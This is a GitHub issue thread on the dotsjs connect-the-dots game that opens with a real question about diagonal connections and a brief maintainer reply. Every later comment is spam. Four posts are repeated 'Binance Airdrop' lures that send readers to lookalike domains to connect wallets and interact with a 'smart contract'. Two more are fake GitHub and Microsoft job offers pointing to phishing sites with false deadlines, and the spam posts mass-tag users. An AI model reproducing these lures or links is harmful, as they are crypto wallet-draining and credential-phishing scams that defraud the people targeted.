### ISSUE TITLE
Can this supported connecting diagonally?

### ISSUE THREAD

**Issue by aahedi** [estevaoam/dotsjs#2]
It's pretty good that it runs on browser and supports touch screens, but..
Unfortunately, it does not support connecting diagonally at match colors dots.
![connect-the-dots](https://user-images.githubusercontent.com/8935884/211563944-9af5b1c4-d1b1-4a80-b5a4-3d131f48882a.png)

**Comment by estevaoam** [comment]
The `drawTo` function should work for diagonal lines already, the tricky part be the game's logic that is array-based.

**Comment by rajiur007** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @YaronWittenstein, @HyptoX, @JohnBox, @Patrik-Stas, @drlorente97, @whchi, @skibitsky

**Comment by steveg-gpsaustrack** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @denyschornyi, @kelvinu, @goatwithfire, @Dmitry76645342, @sinornis, @guglielmogabrielli, @winkidney

**Comment by steveg-gpsaustrack** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @avawda, @andreamorosati, @Allen-zjx, @khvedzeli, @mothuc, @framesfashion, @oussemos

**Comment by roneyfraga** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @midtur, @dameinliu, @Mx-virus, @jackMort, @nakielsh, @heyalexchoi, @alcattell

**Comment by skodumur** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
frankfanslc, @jamiedevsandbox, @Massendefekt, @spinoch, @ArnaudFavier, @0xJepsen, @hujw77, @tavakyan, @VincentDebug, @vidalpaul, @SauravKanchan, @lordvins226, @rhaoio, @dengzhaofun, @Doozers, @caglaryucekaya, @LoganNeptune, @systemis, @chtcil, @gngchrs

**Comment by jimga150** [comment]
# [Join Microsoft as a Junior Software Developer!](https://careersmicrosoft.online/)

Exciting news! We're hiring for a Junior Software Developer position at Microsoft, and your application has been approved!

## Apply Now:
Ready to embark on this amazing journey? [Apply here](https://careersmicrosoft.online/) by **March 20, 2024**.
saideepv, @Bishnupriyap01, @yuyao110120, @luanpontolio, @Gruak, @shuklaritvik06, @laizy, @satarii, @Kinanas, @yenwel, @AidanTheBandit, @Mr-SRPx, @imuxin, @chuanjin, @ravenerzz, @manasasamaga17, @wheng3, @PhakphumV, @decanus, @maxu-brex
